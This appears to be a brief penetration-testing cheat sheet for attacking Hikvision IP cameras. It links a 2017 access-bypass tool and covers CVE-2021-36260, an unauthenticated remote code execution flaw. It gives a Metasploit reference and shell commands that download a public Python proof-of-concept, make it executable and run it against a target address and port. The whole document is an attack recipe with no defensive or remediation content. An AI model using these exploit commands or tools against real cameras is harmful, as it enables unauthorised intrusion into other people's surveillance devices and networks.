2017 Hikvision IP Camera Access Bypass

https://github.com/bp2008/HikPasswordHelper

2021 CVE-2021-36260 - Unauthenticated Remote Code Execution (RCE)

POC: MSF:

https://www.youtube.com/watch?v=3NzdQxqZJqc

Python:

wget <https://raw.githubusercontent.com/mcw0/PoC/master/CVE-2021-36260.py>; chmod +x CVE-2021-36260.py

./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --check